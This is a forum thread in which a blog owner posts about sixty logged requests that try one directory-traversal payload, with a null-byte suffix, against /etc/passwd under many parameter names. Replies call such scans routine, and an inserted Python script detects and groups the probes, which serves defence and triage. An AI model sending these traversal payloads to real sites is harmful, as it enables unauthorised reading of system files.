Greenguy's Board


ecchi 2014-11-13 04:23 AM

Hack Attack
 
Just looked at my stats for yesterday on one of my blogs (http://genuinebondage.com/). There is a whole pile of hits to the main page carrying data for things that simply do not exist on my site. I'm guessing that they think it is WordPress or similar and are trying to hack into the admin area. It is not, it is a script I wrote myself. But I would like to know what is going on. Can anyone tell from the following details what is happening (the attacks were on the main index page, my stats display everything in the URL after the domain name, i.e. "/?acion=../../../../../../../../../../etc/passwd%00 - 1" means one hit on http://genuinebondage.com/?acion=../../../../../../../../../../etc/passwd%00).

Quote:

/?acion=../../../../../../../../../../etc/passwd%00 - 1
/?act=../../../../../../../../../../etc/passwd%00 - 1
/?action=../../../../../../../../../../etc/passwd%00 - 1
/?API_HOME_DIR=../../../../../../../../../../etc/passwd%00 - 1
/?board=../../../../../../../../../../etc/passwd%00 - 1
/?cat=../../../../../../../../../../etc/passwd%00 - 1
/?client_id=../../../../../../../../../../etc/passwd%00 - 1
/?cmd=../../../../../../../../../../etc/passwd%00 - 1
/?cont=../../../../../../../../../../etc/passwd%00 - 1
/?current_frame=../../../../../../../../../../etc/passwd%00 - 1
/?date=../../../../../../../../../../etc/passwd%00 - 1
/?detail=../../../../../../../../../../etc/passwd%00 - 1
/?dir=../../../../../../../../../../etc/passwd%00 - 1
/?display=../../../../../../../../../../etc/passwd%00 - 1
/?download=../../../../../../../../../../etc/passwd%00 - 1
/?f=../../../../../../../../../../etc/passwd%00 - 1
/?file=../../../../../../../../../../etc/passwd%00 - 1
/?fileinclude=../../../../../../../../../../etc/passwd%00 - 1
/?filename=../../../../../../../../../../etc/passwd%00 - 1
/?firm_id=../../../../../../../../../../etc/passwd%00 - 1
/?g=../../../../../../../../../../etc/passwd%00 - 1
/?getdata=../../../../../../../../../../etc/passwd%00 - 1
/?go=../../../../../../../../../../etc/passwd%00 - 1
/?HT=../../../../../../../../../../etc/passwd%00 - 1
/?idd=../../../../../../../../../../etc/passwd%00 - 1
/?inc=../../../../../../../../../../etc/passwd%00 - 1
/?incfile=../../../../../../../../../../etc/passwd%00 - 1
/?incl=../../../../../../../../../../etc/passwd%00 - 1
/?include_file=../../../../../../../../../../etc/passwd%00 - 1
/?include_path=../../../../../../../../../../etc/passwd%00 - 1
/?infile=../../../../../../../../../../etc/passwd%00 - 1
/?info=../../../../../../../../../../etc/passwd%00 - 1
/?lang=../../../../../../../../../../etc/passwd%00 - 1
/?language=../../../../../../../../../../etc/passwd%00 - 1
/?link=../../../../../../../../../../etc/passwd%00 - 1
/?main=../../../../../../../../../../etc/passwd%00 - 1
/?mainspot=../../../../../../../../../../etc/passwd%00 - 1
/?msg=../../../../../../../../../../etc/passwd%00 - 1
/?num=../../../../../../../../../../etc/passwd%00 - 1
/?openfile=../../../../../../../../../../etc/passwd%00 - 1
/?p=../../../../../../../../../../etc/passwd%00 - 1
/?page=../../../../../../../../../../etc/passwd%00 - 1
/?pagina=../../../../../../../../../../etc/passwd%00 - 1
/?path_to_calendar=../../../../../../../../../../etc/passwd%00 - 1
/?pg=../../../../../../../../../../etc/passwd%00 - 1
/?plik../../../../../../../../../../etc/passwd%00 - 1
/?qry_str=../../../../../../../../../../etc/passwd%00 - 1
/?ruta=../../../../../../../../../../etc/passwd%00 - 1
/?safehtml=../../../../../../../../../../etc/passwd%00 - 1
/?section=../../../../../../../../../../etc/passwd%00 - 1
/?showfile=../../../../../../../../../../etc/passwd%00 - 1
/?side=../../../../../../../../../../etc/passwd%00 - 1
/?site_id=../../../../../../../../../../etc/passwd%00 - 1
/?skin=../../../../../../../../../../etc/passwd%00 - 1
/?static=../../../../../../../../../../etc/passwd%00 - 1
/?strona=../../../../../../../../../../etc/passwd%00 - 1
/?sub=../../../../../../../../../../etc/passwd%00 - 1
/?tresc=../../../../../../../../../../etc/passwd%00 - 1
/?url=../../../../../../../../../../etc/passwd%00 - 1
/?user=../../../../../../../../../../etc/passwd%00 - 1

Cleo 2014-11-13 09:05 AM

I see stuff like that on just about all my domains.

housekeeper 2014-11-14 02:40 PM

As Cleo said, those are pretty commonplace, but I would say more geared towards pay sites than blogs. To my knowledge they are PHP-generated scripts that are just run randomly. I've never experienced problems with them over the years, as they mainly target directories that don't exist or try to pull random information.
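
Added example, not part of any post in this thread: a small Python triage script that reads stats lines in the "<request> - <hits>" format quoted above, flags directory-traversal probes for /etc/passwd, and groups them by payload so that one payload sent under many parameter names stands out as an automated scan. The names `classify` and `summarize` are hypothetical, the sample lines are constructed (the URL-encoded variant and the ordinary hit do not come from the thread), and it assumes one query parameter per request, as in the quoted stats.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in the thread's stats format: "<request> - <hits>".
PROBE = "../" * 10 + "etc/passwd%00"
SAMPLE = "\n".join([
    f"/?action={PROBE} - 1",
    f"/?file={PROBE} - 1",
    f"/?plik{PROBE} - 1",                      # no "=", like the "plik" line in the quote
    "/?page=..%2f..%2f..%2fetc%2fpasswd - 2",  # constructed URL-encoded variant
    "/?p=42 - 17",                             # constructed ordinary traffic
])

LINE = re.compile(r"^(?P<request>\S+) - (?P<hits>\d+)$")
TRAVERSAL = re.compile(r"(?:\.\.[/\\]){2,}")   # two or more "../" or "..\" hops


def classify(request):
    """Return (param, payload, flags) for a traversal probe, else None."""
    decoded = unquote(request.partition("?")[2])   # %2f -> "/", %00 -> NUL
    if not TRAVERSAL.search(decoded):
        return None
    name, sep, value = decoded.partition("=")
    if not sep:                                    # malformed probe without "="
        cut = decoded.index("..")
        name, value = decoded[:cut], decoded[cut:]
    flags = {"traversal"}
    if "\x00" in value:
        flags.add("null-byte")   # aimed at truncating a suffix the script appends
    return name, value.replace("\x00", "%00"), flags


def summarize(text):
    """Group probes by payload; one payload under many names means a scanner."""
    groups = defaultdict(lambda: {"params": set(), "hits": 0, "flags": set()})
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        hit = classify(m["request"]) if m else None
        if hit is None:
            continue
        name, payload, flags = hit
        groups[payload]["params"].add(name)
        groups[payload]["hits"] += int(m["hits"])
        groups[payload]["flags"] |= flags
    return dict(groups)


if __name__ == "__main__":
    for payload, g in summarize(SAMPLE).items():
        print(g["hits"], sorted(g["flags"]), sorted(g["params"]), payload)
```

A site that never passes a query parameter into a file path is not affected by these requests; the grouping only confirms that they come from a generic scanner rather than from someone targeting the site's own script.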

ecchi 2014-11-18 03:18 PM

Thanks.


All times are GMT -4.